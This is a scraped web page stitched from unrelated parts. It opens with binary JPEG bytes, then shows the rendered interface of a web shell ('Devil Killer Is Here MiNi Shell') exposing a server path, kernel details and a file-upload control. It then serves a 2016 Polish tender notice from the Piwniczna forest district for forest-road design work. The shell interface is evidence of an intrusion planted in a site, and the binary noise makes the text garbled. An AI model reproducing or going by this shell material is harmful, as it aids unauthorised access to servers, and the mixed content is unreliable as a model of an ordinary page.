JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160222/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160222/17621-N-2016.html

<p class="kh_header"><b>Piwniczna-Zdrój: Wykonanie dokumentacji projektowo kosztorysowej  dla  : 
I. Część  pierwsza :
1.	Budowa drogi Rzyczanów Dolinowa.
2.	Budowa drogi Runek Schronisko - Juchówki.
II. Część druga :
1.	Budowa drogi Majdan Dubne - Jaguszów.
2.	Budowa drogi Zubrzyk - Baraniacki.
III. Część trzecia.
1.	Odtworzenie i remont szlaków zrywkowych na terenie Nadleśnictwa Piwniczna</b><br>
<b>Numer ogłoszenia: 17621 - 2016; data zamieszczenia: 22.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Piwniczna , ul. Zagrody 32, 33-350 Piwniczna-Zdrój, woj. małopolskie, tel. 18 446 40 276, faks 18 4464194.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo kosztorysowej  dla  : 
I. Część  pierwsza :
1.	Budowa drogi Rzyczanów Dolinowa.
2.	Budowa drogi Runek Schronisko - Juchówki.
II. Część druga :
1.	Budowa drogi Majdan Dubne - Jaguszów.
2.	Budowa drogi Zubrzyk - Baraniacki.
III. Część trzecia.
1.	Odtworzenie i remont szlaków zrywkowych na terenie Nadleśnictwa Piwniczna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.1.	Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót wraz z uzyskaniem pozwolenia na budowę dla dróg pkt. 3.1.2 -3.1.5 oraz wykonanie uproszczonej dok. projektowej dla szlaków zrywkowych ( pkt 3.1.6 )
3.1.2.	Budowa drogi Rzyczanów Dolinowa - droga znajduje się w obrębie Rytro na terenie leśnictwa Rzyczanów, przyjęto jej orientacyjną długość na około 4100 mb, po opracowaniu  przez projektanta i przyjęciu przez zamawiającego z założeń przedprojektowych ( zał. nr 9 do SIWZ ) wariantu koncepcji będzie znana faktyczna długość drogi objęta właściwym projektem. 
3.1.3.	Budowa drogi Majdan Dubne - Jaguszów - droga znajduje się w obrębie Muszyna na terenie leśnictwa Majdan, przyjęto jej orientacyjną długość na około 6000 mb, po opracowaniu  przez projektanta i przyjęciu przez zamawiającego z założeń przedprojektowych ( zał. nr 9 do SIWZ ) wariantu koncepcji będzie znana faktyczna długość drogi objęta właściwym projektem
3.1.4.	Budowa drogi Runek Schronisko - Juchówki - droga znajduje się w obrębie Rytro Leśnictwo Runek, przyjęto jej orientacyjną długość na około 3100 mb, po opracowaniu  przez projektanta i przyjęciu przez zamawiającego z założeń przedprojektowych ( zał. nr 9 do SIWZ ) wariantu koncepcji będzie znana faktyczna długość drogi objęta właściwym projektem  
3.1.5.	Budowa drogi Zubrzyk Baraniacki - droga znajduje się w obrębie Rytro w Leśnictwie Zubrzyk, przyjęto jej orientacyjną długość na około 1200 mb, po opracowaniu  przez projektanta i przyjęciu przez zamawiającego z założeń przedprojektowych ( zał. nr 9 do SIWZ ) wariantu koncepcji będzie znana faktyczna długość drogi objęta właściwym projektem   
3.1.6.	Odtworzenie i remont szlaków zrywkowych na terenie Nadleśnictwa Piwniczna - szlaki znajdują na terenie leśnictw : Szczawnik ( około 1600 mb ), Majerz ( około 2100 mb ), Jastrzębik ( około 800 mb ), Zubrzyk ( około 750 mb ), Łomnica ( około 800 mb ), Rzyczanów ( około 650 mb ), Roztoka Mała ( około 1200 mb ). Zakres, zasady i dane do  wykonania uproszczonej dokumentacji dotyczącej szlaków przedstawia załącznik nr 10 do SIWZ. 
3.1.7.	Planowane do budowy drogi znajdują się na terenie Popradzkiego Parku Krajobrazowego, Obszaru Natura 2000 - Ostoja Popradzka PLH 120019.
3.1.8.	Określenie klasyfikacji dróg zgodnie z rozdziałem 1 pkt. 5 Wytycznych prowadzenie robót drogowych w lasach dopuszczonych do wykorzystania w jednostkach organizacyjnych Lasów Państwowych zgodnie z Zarządzeniem nr 16 Dyrektora Generalnego Lasów Państwowych z dnia 19 marca 2014.
3.1.9.	Planowane zadanie obejmuje budowę dróg leśnych o nawierzchni tłuczniowej i nośności umożliwiającej wywóz drewna samochodami wysokotonażowymi, spełniającej kryteria określone dla dróg przeciwpożarowych, zgodnie z rozdziałem 1 pkt.6 Wytycznych prowadzenie robót drogowych w lasach dopuszczonych do wykorzystania w jednostkach organizacyjnych Lasów Państwowych zgodnie z Zarządzeniem nr 16 Dyrektora Generalnego Lasów Państwowych z dnia 19 marca 2014
3.1.10.	Parametry techniczne drogi zgodnie z obowiązującymi wytycznymi dla dróg leśnych wykorzystywanych jako dojazdy pożarowe zgodnie z obowiązującymi przepisami wyszczególnionymi w ust. 3.2 niniejszej SIWZ.
3.1.11.	Założenia przedprojektowe zawarto w załączniku nr 9 do SIWZ.
3.1.12.	Wspólny Słownik Zamówień (CPV): 
71320000-7 - usługi inżynieryjne w zakresie  projektowania,
71322000-1 - usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej,
71332000-4 - geotechniczne usługi inżynieryjne,
71248000-8 - nadzór nad projektem i dokumentacją
3.1.13.	Dokumentacja projektowa winna obejmować wykonanie badań geotechnicznych dla rozpoznania warunków gruntowo- wodnych terenu inwestycji - rozstaw otworów badawczych (wierceń) min. co 250 m na głębokość do 3.0 m na całej długości planowanej drogi. W przypadku skomplikowanych warunków złożoności podłoża rozstaw otworów należy zmniejszyć wg ustaleń projektanta.
3.1.14.	Dokumentacja projektowa winna obejmować wykonanie badania nośności podłoża 
i wykonanie projektu geotechnicznego.
3.1.15.	Wykonawca przyjmuje i ponosi odpowiedzialność za szkody spowodowane uszkodzeniem urządzeń podziemnych jak kable energetyczne, instalacje sieci i inne, których obecność lub brak stwierdzi samodzielnie korzystając z zasobów powszechnej ewidencji gruntów jak również na podstawie stosowanych znaków i jakichkolwiek innych oznak mogących wskazywać na ich istnienie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>20.1	Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa    w art. 67 ust. 1 pkt. 6 ustawy Pzp. na wykonanie dokumentacji projektowych na drogach leśnych i szlakach zrywkowych do 50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1, 71.33.20.00-4, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1	W przedmiotowym postępowaniu wymagane jest wniesienie wadium na zasadach określonych w art. 45 ust. 3 ustawy Pzp. Zamawiający wymaga wniesienia wadium w wysokości :
	dla części I -  6 000.00 zł.  słownie : sześć tysięcy złotych 
	dla części II - 3 500.00 zł.  słownie : trzy tysiące pięćset złotych.
	dla części III - 400.00 zł . słownie czterysta złotych.
8.2	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U. z 2007r. Nr 42, poz.275 z późniejszymi zmianami).
8.3	Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy:
PKO BP  92 1020 2892 0000 5502 0549 5447 w treści przelewu wpisując: z dopiskiem na blankiecie przelewu: Wadium w postępowaniu na Wykonanie dokumentacji projektowo kosztorysowej  dla części I ..........:... II ...............: III .................*                     ( SA.270.1.1.2016 )
* - w miejsce kropek wpisujemy przy danej części kwotę wpłacanego wadium : max dla dwóch części tj. I i III lub II i III lub jednej dowolnie wybranej.
Wadium wnoszone w innej formie jak pieniężna ma zostać przekazana Zmawiającemu przed terminem składania ofert w formie oryginału. Oryginał poręczenia lub gwarancji należy złożyć przed upływem terminu składania ofert 
w pok. Nr 10 - Kasa, w terminie do dnia 03 marca 2016 r. do godz. 09:00 
w kopercie z opisem:
Wadium w postępowaniu na  Wykonanie dokumentacji projektowo kosztorysowej  dla części I ..........:... II ...............: III ................. (SA.270.1.1.2016 )
* - w miejsce kropek wpisujemy przy danej części kwotę wpłacanego wadium : max dla dwóch części tj. I i III lub II i III lub jednej dowolnie wybranej.
Kserokopię poręczenia lub gwarancji należy załączyć do oferty.
8.4	Z treści wadium wnoszonego w formie: poręczenia bankowego, poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać nieodwołalne, bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a oraz art. 46 ust. 5 ustawy PZP. 
8.5	Wadium musi być wniesione najpóźniej przed upływem terminu składania ofert.
8.6	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego. 
8.7	Wadium musi zabezpieczyć cały okres związania ofertą. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium 
w wyznaczonym terminie, zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
8.8	Treść gwarancji wadialnej musi zawierać następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji poręczenia) oraz wskazanie ich siedzib,
b)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem - określenie przedmiotu zamówienia,
c)	kwotę gwarancji poręczenia,
d)	zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, nieodwołalnie i na pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 46 ust. 4a ustawy Pzp oraz art. 46 ust. 5 ustawy Pzp.
8.9.	W przypadku składania oferty przez Wykonawców wspólnie ubiegających się 
o zamówienie w dokumencie wadialnym musi być wyraźnie wskazane, w imieniu jakich podmiotów wadium jest wnoszone. Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo.
8.10.	Zamawiający zatrzyma wadium z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust. 1 ustawy Pzp lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
8.11.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania Umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania Umowy,
c)	zawarcie Umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna niniejszy warunek za spełniony, gdy Wykonawca wykaże, że 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał co najmniej jedną usługę projektową odpowiadającą swoim rodzajem usługom projektowym będącym przedmiotem niniejszego zamówienia, tj. polegającym na sporządzeniu dokumentacji projektowej dotyczącej budowy, rozbudowy lub przebudowy drogi na kwotę minimum 100 000,00 zł brutto. 
Wykonawca nie może zsumować wartości kilku usług projektowych o mniejszym zakresie dla uzyskania wymaganej wartości porównywalnej.
Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia 
o spełnianiu warunków udziału w postępowaniu określonych  w art. 22 ust. 1 ustawy Pzp oraz załącznika nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna niniejszy warunek za spełniony, gdy Wykonawca wykaże, że dysponuje co najmniej jedną osobą zdolną do wykonania zamówienia i posiadającą stosowne uprawnienia do pełnienia samodzielnych funkcji technicznych 
w budownictwie, tj.: 
a)	co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania 
w specjalności drogowej odpowiadającej przedmiotowi zamówienia lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji w odpowiednim zakresie.
Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej 
z zastrzeżeniem art. 12 a oraz innych przepisów ustawy - Prawo budowlane (Dz. U. 
z 2013 poz. 1409 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394) lub posiada uprawnienia zgodnie z Dyrektywą 2005/36/WE Parlamentu Europejskiego i Rady z dnia 7 września 2005 r. w sprawie uznawania kwalifikacji zawodowych (Tekst mający znaczenie dla EOG), aktualne w terminie składania ofert.
Ocena spełniania tego warunku zostanie dokonana  na podstawie oświadczenia 
o spełnianiu warunków udziału w postępowaniu określonych  w art. 22 ust. 1 ustawy Pzp oraz załączników nr 6 i 6a do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna niniejszy warunek za spełniony, gdy Wykonawca wykaże, 
że posiada środki finansowe lub zdolność kredytową do wykonania zamówienia na kwotę minimum: 100 000,00 zł (słownie: sto tysięcy złotych 00/100). 
Ocena spełniania tego warunku zostanie dokonana  na podstawie oświadczenia 
o spełnianiu warunków udziału w postępowaniu określonych  w art. 22 ust. 1 ustawy Pzp oraz informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 93</li>
<li>2 - Ilość wizyt w ramach nadzoru autorskiego - 7</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1.1.	Zamawiający przewiduje możliwość zmiany Umowy w sytuacji pojawienia się w trakcie realizacji zamówienia nowej, nieprzewidzianej przez projektanta i Zamawiającego konieczności wykonania prac niezbędnych do prawidłowego funkcjonowania przedmiotu zamówienia, związanej między innymi z nieprzewidywalnymi, ale zasadnymi oczekiwaniami miejscowej społeczności, a także zmianami przepisów prawa, czego nie uwzględniono w SIWZ i złożonej ofercie. Jeśli będzie taka potrzeba związana z w/w sytuacjami możliwe jest przedłużenie terminu wykonania zadania o czas niezbędny do zrealizowania przedmiotu zamówienia.
1.2.	Zamawiający przewiduje możliwość zmiany wynagrodzenia należnego Wykonawcy w sytuacji zmiany obowiązującej stawki VAT: 
